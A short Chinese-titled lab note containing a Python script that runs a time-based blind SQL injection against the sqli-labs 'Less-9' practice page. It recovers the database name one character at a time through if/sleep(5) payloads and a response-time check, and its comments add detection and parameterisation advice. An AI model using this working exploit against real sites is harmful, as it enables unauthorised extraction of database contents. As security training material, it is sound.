mysql基于时间的盲注
使用python代码进行爆破库名
import requests
import time

# Time-based blind SQL injection probe against the sqli-labs "Less-9" training page.
# The script recovers the value of database() one character at a time: every request
# asks the server "is the ASCII code of character i greater than mid?", and the answer
# is read from how long the response takes (the false branch calls sleep(5)).
# Defender's view: the only signal is timing, so the traffic is a long run of
# near-identical GETs to the same endpoint whose id parameter carries ascii(/substr(/
# sleep( tokens, with response latencies clustering near 0 s and 5 s. Parameterising
# the id lookup removes the injection; logging rules on those tokens and on per-client
# latency distribution make the probing visible.

s = requests.session()  # a Session object must exist before its request methods can be called
url = 'http://192.168.2.101/sqli-labs-master/Less-9/?id='  # lab target; everything appended after ?id= is injected
flag = ''   # characters recovered so far, in order
i = 0       # 1-based position into database()
while True:
    i = i + 1
    # Binary search over printable ASCII [32, 127) for the code of character i.
    low = 32
    high = 127
    while low < high:
        mid = (low + high) // 2
        # %0c (form feed) stands in for spaces and --+ comments out the rest of the
        # original query (the + decodes to the space that "-- " requires).
        # Query the database name:
        payload = f'1\'%0cand%0cif((ascii(substr(database(),{i},1))>{mid}),1,sleep(5))--+'
        # (The original also carried several commented-out payload variants aimed at
        # other schema objects; dropped here as dead code.)
        stime = time.time()
        url1 = url + payload
        r = s.get(url=url1)
        r.encoding = "utf-8"  # no effect: the response body is never read, only its timing
        # print(payload)
        # Decide by elapsed time: the true branch answers at once, the false branch
        # sleeps. The 3 s threshold sits below sleep(5); a request that is merely slow
        # for network reasons but still under 3 s is counted as "true".
        if time.time() - stime < 3:
            low = mid + 1   # ascii(char) > mid
        else:
            high = mid      # ascii(char) <= mid
    # Past the end of the string substr() yields '' and MySQL's ascii('') is 0, so the
    # search bottoms out at low == 32 and the outer loop ends.
    # NOTE(review): an actual space (code 32) in the value would also stop the loop here.
    if low != 32:
        flag += chr(low)
    else:
        break
print(flag)